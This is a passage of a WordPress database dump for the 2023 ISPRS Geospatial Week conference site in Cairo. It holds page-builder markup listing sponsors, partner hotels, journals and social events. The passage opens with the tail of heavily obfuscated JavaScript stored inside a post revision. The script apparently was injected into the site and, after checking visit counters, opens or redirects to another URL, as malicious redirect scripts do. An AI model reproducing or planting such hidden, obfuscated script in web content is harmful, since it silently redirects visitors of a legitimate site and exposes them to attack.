_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-25 06:33:57','2023-08-25 06:33:57','',3066,'https://gsw2023.com/?p=5399',0,'revision','',0),
(5400,1,'2023-08-25 07:00:16','2023-08-25 07:00:16','','Untitled-3','','inherit','open','closed','','untitled-3','','','2023-08-25 07:00:16','2023-08-25 07:00:16','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg',0,'attachment','image/jpeg',0),
(5402,1,'2023-09-16 22:41:12','2023-08-26 18:45:08','','Downloading the GSW23 App','','publish','closed','closed','','downloading-the-gsw23-app','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=5402',30,'nav_menu_item','',0),
(5403,1,'2023-08-26 20:12:07','2023-08-26 20:12:07','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" 